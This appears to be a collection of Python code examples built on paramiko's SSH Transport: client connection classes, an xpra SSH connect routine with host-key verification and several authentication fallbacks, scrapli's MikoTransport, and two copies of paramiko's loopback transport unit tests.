of reads/writes that would implement this in a sane fashion for paramiko Args: N/A # noqa Returns: N/A # noqa Raises: N/A # noqa """ while True: time.sleep(0.01) if self.channel.recv_ready(): self._paramiko_read_channel() else: self.channel.write("\n") return def _set_blocking(self, blocking): # Add docstring # need to reset timeout because it seems paramiko sets it to 0 if you set to non blocking # paramiko uses seconds instead of ms self.channel.setblocking(blocking) self.channel.settimeout(self.session_timeout / 1000) def _set_timeout(self, timeout): # paramiko uses seconds instead of ms self.channel.settimeout(timeout / 1000)
class ParamikoSshConnection(BaseSshConnection): def connect(self, wait_prompt=True): self.socket = socket(AF_INET, SOCK_STREAM) self.socket.connect((self.hostname, self.port)) self.session = Transport(self.socket) self.session.start_client() if self.password is not None: self.session.auth_password(self.username, self.password) elif self.key_algorithm != DSA_KEY_ALGORITHM: key = RSAKey.from_private_key_file( self.private_key_file, self.key_passphrase ) self.session.auth_publickey(self.username, key) else: key = DSSKey.from_private_key_file( self.private_key_file, self.key_passphrase ) self.session.auth_publickey(self.username, key) self.channel = self.session.open_session() self.channel.get_pty() self.channel.invoke_shell() if wait_prompt: self.receive() @property def connected(self): return bool( self.socket and not self.socket._closed and self.session and self.channel ) def send(self, line, socket_timeout=None): socket_timeout = ( socket_timeout if socket_timeout is not None else self.socket_timeout ) self.channel.settimeout(socket_timeout) size = self.channel.sendall(line + "\n") return size def receive( self, regex=None, socket_timeout=None, timeout=None, buffer_size=None ): regex = regex if regex is not None else self.prompt_regex socket_timeout = ( socket_timeout if socket_timeout is not None else self.socket_timeout ) timeout = timeout if timeout is not None else self.timeout buffer_size = ( buffer_size if buffer_size is not None else self.buffer_size ) assert regex is not None assert socket_timeout is None or isinstance( socket_timeout, (int, float) ) assert timeout is None or isinstance(timeout, (int, float)) assert isinstance(buffer_size, int) and buffer_size > 0 self.channel.settimeout(socket_timeout) start = time() output = self.channel.recv(buffer_size).decode() LOG.debug(output) size = len(output) duration = time() - start while ( not regex.search(output) and (timeout is None or duration < timeout) and size > 0 ): data = self.channel.recv(buffer_size).decode() LOG.debug(data) size = len(data) output += data duration = time() - start if size < 0 and size != LIBSSH2_ERROR_EAGAIN: raise ReceiveException(size, output, duration) if not size: raise SocketTimeoutException( output, socket_timeout, duration, regex.pattern ) if timeout is not None and duration >= timeout: raise ReceiveTimeoutException( output, timeout, duration, regex.pattern ) return self.sanitize(output) def disconnect(self): if self.session: self.session.close() if self.channel: self.channel.close() if self.socket: self.socket.close()
def do_ssh_paramiko_connect_to(sock, host, port, username, password, proxy_command, remote_xpra, socket_dir, display_as_args, target): from paramiko import SSHException, Transport, Agent, RSAKey, PasswordRequiredException from paramiko.hostkeys import HostKeys transport = Transport(sock) transport.use_compression(False) log("SSH transport %s", transport) try: transport.start_client() except SSHException as e: log("start_client()", exc_info=True) raise InitException("SSH negotiation failed: %s" % e) host_key = transport.get_remote_server_key() assert host_key, "no remote server key" log("remote_server_key=%s", keymd5(host_key)) if VERIFY_HOSTKEY: host_keys = HostKeys() host_keys_filename = None KNOWN_HOSTS = get_ssh_known_hosts_files() for known_hosts in KNOWN_HOSTS: host_keys.clear() try: path = os.path.expanduser(known_hosts) if os.path.exists(path): host_keys.load(path) log("HostKeys.load(%s) successful", path) host_keys_filename = path break except IOError: log("HostKeys.load(%s)", known_hosts, exc_info=True) log("host keys=%s", host_keys) keys = host_keys.lookup(host) known_host_key = (keys or {}).get(host_key.get_name()) def keyname(): return host_key.get_name().replace("ssh-", "") if host_key==known_host_key: assert host_key log("%s host key '%s' OK for host '%s'", keyname(), keymd5(host_key), host) else: if known_host_key: log.warn("Warning: SSH server key mismatch") qinfo = [ "WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!", "IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!", "Someone could be eavesdropping on you right now (man-in-the-middle attack)!", "It is also possible that a host key has just been changed.", "The fingerprint for the %s key sent by the remote host is" % keyname(), keymd5(host_key), ] if VERIFY_STRICT: log.warn("Host key verification failed.") #TODO: show alert with no option to accept key qinfo += [ "Please contact your system administrator.", "Add correct host key in %s to get rid of this message.", "Offending %s key in %s" % (keyname(), host_keys_filename), "ECDSA host key for %s has changed and you have requested strict checking." % keyname(), ] sys.stderr.write(os.linesep.join(qinfo)) transport.close() raise InitExit(EXIT_SSH_KEY_FAILURE, "SSH Host key has changed") if not confirm_key(qinfo): transport.close() raise InitExit(EXIT_SSH_KEY_FAILURE, "SSH Host key has changed") else: assert (not keys) or (host_key.get_name() not in keys) if not keys: log.warn("Warning: unknown SSH host") else: log.warn("Warning: unknown %s SSH host key", keyname()) qinfo = [ "The authenticity of host '%s' can't be established." % (host,), "%s key fingerprint is" % keyname(), keymd5(host_key), ] if not confirm_key(qinfo): transport.close() raise InitExit(EXIT_SSH_KEY_FAILURE, "Unknown SSH host '%s'" % host) if ADD_KEY: try: if not host_keys_filename: #the first one is the default, #ie: ~/.ssh/known_hosts on posix host_keys_filename = os.path.expanduser(KNOWN_HOSTS[0]) log("adding %s key for host '%s' to '%s'", keyname(), host, host_keys_filename) if not os.path.exists(host_keys_filename): keys_dir = os.path.dirname(host_keys_filename) if not os.path.exists(keys_dir): log("creating keys directory '%s'", keys_dir) os.mkdir(keys_dir, 0o700) elif not os.path.isdir(keys_dir): log.warn("Warning: '%s' is not a directory") log.warn(" key not saved") if os.path.exists(keys_dir) and os.path.isdir(keys_dir): log("creating known host file '%s'", host_keys_filename) with umask_context(0o133): with open(host_keys_filename, 'a+'): pass host_keys.add(host, host_key.get_name(), host_key) host_keys.save(host_keys_filename) except OSError as e: log("failed to add key to '%s'", host_keys_filename) log.error("Error adding key to '%s'", host_keys_filename) log.error(" %s", e) except Exception as e: log.error("cannot add key", exc_info=True) def auth_agent(): agent = Agent() agent_keys = agent.get_keys() log("agent keys: %s", agent_keys) if agent_keys: for agent_key in agent_keys: log("trying ssh-agent key '%s'", keymd5(agent_key)) try: transport.auth_publickey(username, agent_key) if transport.is_authenticated(): log("authenticated using agent and key '%s'", keymd5(agent_key)) break except SSHException: log("agent key '%s' rejected", keymd5(agent_key), exc_info=True) if not transport.is_authenticated(): log.info("agent authentication failed, tried %i key%s", len(agent_keys), engs(agent_keys)) def auth_publickey(): log("trying public key authentication") for keyfile in ("id_rsa", "id_dsa"): keyfile_path = osexpand(os.path.join("~/", ".ssh", keyfile)) if not os.path.exists(keyfile_path): log("no keyfile at '%s'", keyfile_path) continue key = None try: key = RSAKey.from_private_key_file(keyfile_path) except PasswordRequiredException: log("%s keyfile requires a passphrase", keyfile_path) passphrase = input_pass("please enter the passphrase for %s:" % (keyfile_path,)) if passphrase: try: key = RSAKey.from_private_key_file(keyfile_path, passphrase) except SSHException as e: log("from_private_key_file", exc_info=True) log.info("cannot load key from file '%s':", keyfile_path) log.info(" %s", e) if key: log("auth_publickey using %s: %s", keyfile_path, keymd5(key)) try: transport.auth_publickey(username, key) except SSHException as e: log("key '%s' rejected", keyfile_path, exc_info=True) log.info("SSH authentication using key '%s' failed:", keyfile_path) log.info(" %s", e) else: if transport.is_authenticated(): break def auth_none(): log("trying none authentication") try: transport.auth_none(username) except SSHException as e: log("auth_none()", exc_info=True) def auth_password(): log("trying password authentication") try: transport.auth_password(username, password) except SSHException as e: log("auth_password(..)", exc_info=True) log.info("SSH password authentication failed: %s", e) banner = transport.get_banner() if banner: log.info("SSH server banner:") for x in banner.splitlines(): log.info(" %s", x) log("starting authentication") if not transport.is_authenticated() and NONE_AUTH: auth_none() if not transport.is_authenticated() and PASSWORD_AUTH and password: auth_password() if not transport.is_authenticated() and AGENT_AUTH: auth_agent() if not transport.is_authenticated() and KEY_AUTH: auth_publickey() if not transport.is_authenticated() and PASSWORD_AUTH and not password: for _ in range(1+PASSWORD_RETRY): password = input_pass("please enter the SSH password for %s@%s" % (username, host)) if not password: break auth_password() if transport.is_authenticated(): break if not transport.is_authenticated(): transport.close() raise InitException("SSH Authentication failed") assert len(remote_xpra)>0 log("will try to run xpra from: %s", remote_xpra) for xpra_cmd in remote_xpra: try: chan = transport.open_session(window_size=None, max_packet_size=0, timeout=60) chan.set_name("find %s" % xpra_cmd) except SSHException as e: log("open_session", exc_info=True) raise InitException("failed to open SSH session: %s" % e) cmd = "which %s" % xpra_cmd log("exec_command('%s')", cmd) chan.exec_command(cmd) #poll until the command terminates: start = monotonic_time() while not chan.exit_status_ready(): if monotonic_time()-start>10: chan.close() raise InitException("SSH test command '%s' timed out" % cmd) log("exit status is not ready yet, sleeping") time.sleep(0.01) r = chan.recv_exit_status() log("exec_command('%s')=%s", cmd, r) chan.close() if r!=0: continue cmd = xpra_cmd + " " + " ".join(shellquote(x) for x in proxy_command) if socket_dir: cmd += " \"--socket-dir=%s\"" % socket_dir if display_as_args: cmd += " " cmd += " ".join(shellquote(x) for x in display_as_args) log("cmd(%s, %s)=%s", proxy_command, display_as_args, cmd) #see https://github.com/paramiko/paramiko/issues/175 #WINDOW_SIZE = 2097152 log("trying to open SSH session, window-size=%i, timeout=%i", WINDOW_SIZE, TIMEOUT) try: chan = transport.open_session(window_size=WINDOW_SIZE, max_packet_size=0, timeout=TIMEOUT) chan.set_name("run-xpra") except SSHException as e: log("open_session", exc_info=True) raise InitException("failed to open SSH session: %s" % e) else: log("channel exec_command(%s)" % cmd) chan.exec_command(cmd) info = { "host" : host, "port" : port, } conn = SSHSocketConnection(chan, sock, target, info) conn.timeout = SOCKET_TIMEOUT conn.start_stderr_reader() child = None conn.process = (child, "ssh", cmd) return conn raise Exception("all SSH remote proxy commands have failed")
class MikoTransport(Transport): def __init__( self, host: str, port: int = -1, auth_username: str = "", auth_private_key: str = "", auth_password: str = "", auth_strict_key: bool = True, timeout_socket: int = 5, timeout_transport: int = 5, timeout_exit: bool = True, ssh_config_file: str = "", ssh_known_hosts_file: str = "", ) -> None: """ MikoTransport Object Inherit from Transport ABC MikoTransport <- Transport (ABC) Args: host: host ip/name to connect to port: port to connect to auth_username: username for authentication auth_private_key: path to private key for authentication auth_password: password for authentication auth_strict_key: True/False to enforce strict key checking (default is True) timeout_socket: timeout for establishing socket in seconds timeout_transport: timeout for ssh transport in seconds timeout_exit: True/False close transport if timeout encountered ssh_config_file: string to path for ssh config file ssh_known_hosts_file: string to path for ssh known hosts file Returns: N/A # noqa: DAR202 Raises: N/A """ cfg_port, cfg_user, cfg_private_key = self._process_ssh_config(host, ssh_config_file) if port == -1: port = cfg_port or 22 super().__init__( host, port, timeout_socket, timeout_transport, timeout_exit, ) self.auth_username: str = auth_username or cfg_user self.auth_private_key: str = auth_private_key or cfg_private_key self.auth_password: str = auth_password self.auth_strict_key: bool = auth_strict_key self.ssh_known_hosts_file: str = ssh_known_hosts_file self.session: ParamikoTransport self.channel: Channel self.socket = Socket(host=self.host, port=self.port, timeout=self.timeout_socket) @staticmethod def _process_ssh_config(host: str, ssh_config_file: str) -> Tuple[Optional[int], str, str]: """ Method to parse ssh config file In the future this may move to be a 'helper' function as it should be very similar between paramiko and and ssh2-python... for now it can be a static method as there may be varying supported args between the two transport drivers. Args: host: host to lookup in ssh config file ssh_config_file: string path to ssh config file; passed down from `Scrape`, or the `NetworkDriver` or subclasses of it, in most cases. Returns: Tuple: port to use for ssh, username to use for ssh, identity file (private key) to use for ssh auth Raises: N/A """ ssh = SSHConfig(ssh_config_file) host_config = ssh.lookup(host) return host_config.port, host_config.user or "", host_config.identity_file or "" def open(self) -> None: """ Parent method to open session, authenticate and acquire shell Args: N/A Returns: N/A # noqa: DAR202 Raises: Exception: if socket handshake fails ScrapliAuthenticationFailed: if all authentication means fail """ if not self.socket.socket_isalive(): self.socket.socket_open() try: self.session = ParamikoTransport(self.socket.sock) self.session.start_client() except Exception as exc: LOG.critical(f"Failed to complete handshake with host {self.host}; Exception: {exc}") raise exc if self.auth_strict_key: LOG.debug(f"Attempting to validate {self.host} public key") self._verify_key() self._authenticate() if not self._isauthenticated(): msg = f"Authentication to host {self.host} failed" LOG.critical(msg) raise ScrapliAuthenticationFailed(msg) self._open_channel() def _verify_key(self) -> None: """ Verify target host public key, raise exception if invalid/unknown Args: N/A Returns: N/A # noqa: DAR202 Raises: KeyVerificationFailed: if host is not in known hosts KeyVerificationFailed: if host is in known hosts but public key does not match """ known_hosts = SSHKnownHosts(self.ssh_known_hosts_file) if self.host not in known_hosts.hosts.keys(): raise KeyVerificationFailed(f"{self.host} not in known_hosts!") remote_server_key = self.session.get_remote_server_key() remote_public_key = remote_server_key.get_base64() if known_hosts.hosts[self.host]["public_key"] != remote_public_key: raise KeyVerificationFailed( f"{self.host} in known_hosts but public key does not match!" ) def _authenticate(self) -> None: """ Parent method to try all means of authentication Args: N/A Returns: N/A # noqa: DAR202 Raises: ScrapliAuthenticationFailed: if authentication fails """ if self.auth_private_key: self._authenticate_public_key() if self._isauthenticated(): LOG.debug(f"Authenticated to host {self.host} with public key auth") return if not self.auth_password or not self.auth_username: msg = ( f"Failed to authenticate to host {self.host} with private key " f"`{self.auth_private_key}`. Unable to continue authentication, " "missing username, password, or both." ) LOG.critical(msg) raise ScrapliAuthenticationFailed(msg) self._authenticate_password() if self._isauthenticated(): LOG.debug(f"Authenticated to host {self.host} with password") def _authenticate_public_key(self) -> None: """ Attempt to authenticate with public key authentication Args: N/A Returns: N/A # noqa: DAR202 Raises: N/A """ try: paramiko_key = RSAKey(filename=self.auth_private_key) self.session.auth_publickey(self.auth_username, paramiko_key) except AuthenticationException as exc: LOG.critical( f"Public key authentication with host {self.host} failed. Exception: {exc}." ) except Exception as exc: # pylint: disable=W0703 LOG.critical( "Unknown error occurred during public key authentication with host " f"{self.host}; Exception: {exc}" ) def _authenticate_password(self) -> None: """ Attempt to authenticate with password authentication Args: N/A Returns: N/A # noqa: DAR202 Raises: Exception: if unknown (i.e. not auth failed) exception occurs """ try: self.session.auth_password(self.auth_username, self.auth_password) except AuthenticationException as exc: LOG.critical( f"Password authentication with host {self.host} failed. Exception: {exc}." "\n\tNote: Paramiko automatically attempts both standard auth as well as keyboard " "interactive auth. Paramiko exception about bad auth type may be misleading!" ) except Exception as exc: LOG.critical( "Unknown error occurred during password authentication with host " f"{self.host}; Exception: {exc}" ) raise exc def _isauthenticated(self) -> bool: """ Check if session is authenticated Args: N/A Returns: bool: True if authenticated, else False Raises: N/A """ authenticated: bool = self.session.is_authenticated() return authenticated def _open_channel(self) -> None: """ Open channel, acquire pty, request interactive shell Args: N/A Returns: N/A # noqa: DAR202 Raises: N/A """ self.channel = self.session.open_session() self.set_timeout(self.timeout_transport) self.channel.get_pty() self.channel.invoke_shell() LOG.debug(f"Channel to host {self.host} opened") def close(self) -> None: """ Close session and socket Args: N/A Returns: N/A # noqa: DAR202 Raises: N/A """ self.channel.close() LOG.debug(f"Channel to host {self.host} closed") self.socket.socket_close() def isalive(self) -> bool: """ Check if socket is alive and session is authenticated Args: N/A Returns: bool: True if socket is alive and session authenticated, else False Raises: N/A """ if self.socket.socket_isalive() and self.session.is_alive() and self._isauthenticated(): return True return False def read(self) -> bytes: """ Read data from the channel Args: N/A Returns: bytes: bytes output as read from channel Raises: N/A """ channel_read: bytes = self.channel.recv(65535) return channel_read def write(self, channel_input: str) -> None: """ Write data to the channel Args: channel_input: string to send to channel Returns: N/A # noqa: DAR202 Raises: N/A """ self.channel.send(channel_input) # type: ignore def set_timeout(self, timeout: int) -> None: """ Set session timeout Args: timeout: timeout in seconds Returns: N/A # noqa: DAR202 Raises: N/A """ self.channel.settimeout(timeout)
class TransportTest (unittest.TestCase): def setUp(self): self.socks = LoopSocket() self.sockc = LoopSocket() self.sockc.link(self.socks) self.tc = Transport(self.sockc) self.ts = Transport(self.socks) def tearDown(self): self.tc.close() self.ts.close() self.socks.close() self.sockc.close() def setup_test_server(self): host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() self.server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, self.server) self.tc.connect(hostkey=public_host_key) self.tc.auth_password(username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_1_security_options(self): o = self.tc.get_security_options() self.assertEquals(type(o), SecurityOptions) self.assert_(('aes256-cbc', 'blowfish-cbc') != o.ciphers) o.ciphers = ('aes256-cbc', 'blowfish-cbc') self.assertEquals(('aes256-cbc', 'blowfish-cbc'), o.ciphers) try: o.ciphers = ('aes256-cbc', 'made-up-cipher') self.assert_(False) except ValueError: pass try: o.ciphers = 23 self.assert_(False) except TypeError: pass def test_2_compute_key(self): self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929L self.tc.H = unhexlify('0C8307CDE6856FF30BA93684EB0F04C2520E9ED3') self.tc.session_id = self.tc.H key = self.tc._compute_key('C', 32) self.assertEquals('207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995', hexlify(key).upper()) def test_3_simple(self): """ verify that we can establish an ssh link with ourselves across the loopback sockets. this is hardly "simple" but it's simpler than the later tests. :) """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.assertEquals(None, self.tc.get_username()) self.assertEquals(None, self.ts.get_username()) self.assertEquals(False, self.tc.is_authenticated()) self.assertEquals(False, self.ts.is_authenticated()) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) self.assertEquals('slowdive', self.tc.get_username()) self.assertEquals('slowdive', self.ts.get_username()) self.assertEquals(True, self.tc.is_authenticated()) self.assertEquals(True, self.ts.is_authenticated()) def test_4_special(self): """ verify that the client can demand odd handshake settings, and can renegotiate keys in mid-stream. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) options = self.tc.get_security_options() options.ciphers = ('aes256-cbc',) options.digests = ('hmac-md5-96',) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) self.assertEquals('aes256-cbc', self.tc.local_cipher) self.assertEquals('aes256-cbc', self.tc.remote_cipher) self.assertEquals(12, self.tc.packetizer.get_mac_size_out()) self.assertEquals(12, self.tc.packetizer.get_mac_size_in()) self.tc.send_ignore(1024) self.tc.renegotiate_keys() self.ts.send_ignore(1024) def test_5_keepalive(self): """ verify that the keepalive will be sent. """ self.tc.set_hexdump(True) host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) self.assertEquals(None, getattr(server, '_global_request', None)) self.tc.set_keepalive(1) time.sleep(2) self.assertEquals('*****@*****.**', server._global_request) def test_6_bad_auth_type(self): """ verify that we get the right exception when an unsupported auth type is requested. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) try: self.tc.connect(hostkey=public_host_key, username='******', password='******') self.assert_(False) except: etype, evalue, etb = sys.exc_info() self.assertEquals(BadAuthenticationType, etype) self.assertEquals(['publickey'], evalue.allowed_types) def test_7_bad_password(self): """ verify that a bad password gets the right exception, and that a retry with the right password works. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) self.tc.ultra_debug = True self.tc.connect(hostkey=public_host_key) try: self.tc.auth_password(username='******', password='******') self.assert_(False) except: etype, evalue, etb = sys.exc_info() self.assert_(issubclass(etype, SSHException)) self.tc.auth_password(username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_8_multipart_auth(self): """ verify that multipart auth works. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) self.tc.ultra_debug = True self.tc.connect(hostkey=public_host_key) remain = self.tc.auth_password(username='******', password='******') self.assertEquals(['publickey'], remain) key = DSSKey.from_private_key_file('tests/test_dss.key') remain = self.tc.auth_publickey(username='******', key=key) self.assertEquals([], remain) event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_9_interactive_auth(self): """ verify keyboard-interactive auth works. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) self.tc.ultra_debug = True self.tc.connect(hostkey=public_host_key) def handler(title, instructions, prompts): self.got_title = title self.got_instructions = instructions self.got_prompts = prompts return ['cat'] remain = self.tc.auth_interactive('commie', handler) self.assertEquals(self.got_title, 'password') self.assertEquals(self.got_prompts, [('Password', False)]) self.assertEquals([], remain) event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_A_interactive_auth_fallback(self): """ verify that a password auth attempt will fallback to "interactive" if password auth isn't supported but interactive is. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) self.tc.ultra_debug = True self.tc.connect(hostkey=public_host_key) remain = self.tc.auth_password('commie', 'cat') self.assertEquals([], remain) event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_B_exec_command(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) try: chan.exec_command('no') self.assert_(False) except SSHException, x: pass chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() f = chan.makefile() self.assertEquals('Hello there.\n', f.readline()) self.assertEquals('', f.readline()) f = chan.makefile_stderr() self.assertEquals('This is on stderr.\n', f.readline()) self.assertEquals('', f.readline()) # now try it with combined stdout/stderr chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() chan.set_combine_stderr(True) f = chan.makefile() self.assertEquals('Hello there.\n', f.readline()) self.assertEquals('This is on stderr.\n', f.readline()) self.assertEquals('', f.readline())
class TransportTest(unittest.TestCase): def setUp(self): self.socks = LoopSocket() self.sockc = LoopSocket() self.sockc.link(self.socks) self.tc = Transport(self.sockc) self.ts = Transport(self.socks) def tearDown(self): self.tc.close() self.ts.close() self.socks.close() self.sockc.close() def setup_test_server(self): host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() self.server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, self.server) self.tc.connect(hostkey=public_host_key) self.tc.auth_password(username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_1_security_options(self): o = self.tc.get_security_options() self.assertEquals(type(o), SecurityOptions) self.assert_(('aes256-cbc', 'blowfish-cbc') != o.ciphers) o.ciphers = ('aes256-cbc', 'blowfish-cbc') self.assertEquals(('aes256-cbc', 'blowfish-cbc'), o.ciphers) try: o.ciphers = ('aes256-cbc', 'made-up-cipher') self.assert_(False) except ValueError: pass try: o.ciphers = 23 self.assert_(False) except TypeError: pass def test_2_compute_key(self): self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929L self.tc.H = unhexlify('0C8307CDE6856FF30BA93684EB0F04C2520E9ED3') self.tc.session_id = self.tc.H key = self.tc._compute_key('C', 32) self.assertEquals( '207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995', hexlify(key).upper()) def test_3_simple(self): """ verify that we can establish an ssh link with ourselves across the loopback sockets. this is hardly "simple" but it's simpler than the later tests. :) """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.assertEquals(None, self.tc.get_username()) self.assertEquals(None, self.ts.get_username()) self.assertEquals(False, self.tc.is_authenticated()) self.assertEquals(False, self.ts.is_authenticated()) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) self.assertEquals('slowdive', self.tc.get_username()) self.assertEquals('slowdive', self.ts.get_username()) self.assertEquals(True, self.tc.is_authenticated()) self.assertEquals(True, self.ts.is_authenticated()) def test_4_special(self): """ verify that the client can demand odd handshake settings, and can renegotiate keys in mid-stream. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) options = self.tc.get_security_options() options.ciphers = ('aes256-cbc', ) options.digests = ('hmac-md5-96', ) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) self.assertEquals('aes256-cbc', self.tc.local_cipher) self.assertEquals('aes256-cbc', self.tc.remote_cipher) self.assertEquals(12, self.tc.packetizer.get_mac_size_out()) self.assertEquals(12, self.tc.packetizer.get_mac_size_in()) self.tc.send_ignore(1024) self.tc.renegotiate_keys() self.ts.send_ignore(1024) def test_5_keepalive(self): """ verify that the keepalive will be sent. """ self.tc.set_hexdump(True) host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) self.assertEquals(None, getattr(server, '_global_request', None)) self.tc.set_keepalive(1) time.sleep(2) self.assertEquals('*****@*****.**', server._global_request) def test_6_bad_auth_type(self): """ verify that we get the right exception when an unsupported auth type is requested. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) try: self.tc.connect(hostkey=public_host_key, username='******', password='******') self.assert_(False) except: etype, evalue, etb = sys.exc_info() self.assertEquals(BadAuthenticationType, etype) self.assertEquals(['publickey'], evalue.allowed_types) def test_7_bad_password(self): """ verify that a bad password gets the right exception, and that a retry with the right password works. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) self.tc.ultra_debug = True self.tc.connect(hostkey=public_host_key) try: self.tc.auth_password(username='******', password='******') self.assert_(False) except: etype, evalue, etb = sys.exc_info() self.assert_(issubclass(etype, SSHException)) self.tc.auth_password(username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_8_multipart_auth(self): """ verify that multipart auth works. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) self.tc.ultra_debug = True self.tc.connect(hostkey=public_host_key) remain = self.tc.auth_password(username='******', password='******') self.assertEquals(['publickey'], remain) key = DSSKey.from_private_key_file('tests/test_dss.key') remain = self.tc.auth_publickey(username='******', key=key) self.assertEquals([], remain) event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_9_interactive_auth(self): """ verify keyboard-interactive auth works. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) self.tc.ultra_debug = True self.tc.connect(hostkey=public_host_key) def handler(title, instructions, prompts): self.got_title = title self.got_instructions = instructions self.got_prompts = prompts return ['cat'] remain = self.tc.auth_interactive('commie', handler) self.assertEquals(self.got_title, 'password') self.assertEquals(self.got_prompts, [('Password', False)]) self.assertEquals([], remain) event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_A_interactive_auth_fallback(self): """ verify that a password auth attempt will fallback to "interactive" if password auth isn't supported but interactive is. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, server) self.tc.ultra_debug = True self.tc.connect(hostkey=public_host_key) remain = self.tc.auth_password('commie', 'cat') self.assertEquals([], remain) event.wait(1.0) self.assert_(event.isSet()) 